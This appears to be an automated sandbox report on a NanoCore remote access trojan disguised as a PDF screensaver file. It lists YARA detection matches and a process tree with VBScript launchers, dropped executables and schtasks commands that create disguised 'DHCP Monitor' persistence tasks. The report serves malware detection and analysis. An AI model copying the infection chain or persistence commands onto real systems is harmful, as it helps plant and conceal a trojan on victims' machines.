Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0037F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

2_2_0037F122

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: String function: 00330DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: String function: 0032FD60 appears 40 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: String function: 00CDEC50 appears 56 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: String function: 00CDEB78 appears 39 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: String function: 00CDF5F0 appears 31 times

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00CC6FAA

Sample file is different than original file name gathered from version info

Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameautoruns.exeL, vs 026910003102350.pdf.scr.exe

Source: 026910003102350.pdf.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@43/44@4/2

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CC6C74 GetLastError,FormatMessageW,

0_2_00CC6C74

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00CDA6C2

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: 026910003102350.pdf.scr.exe	ReversingLabs: Detection: 46%
Source: 026910003102350.pdf.scr.exe	Virustotal: Detection: 45%

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File read: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\026910003102350.pdf.scr.exe C:\Users\user\Desktop\026910003102350.pdf.scr.exe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe	Jump to behavior
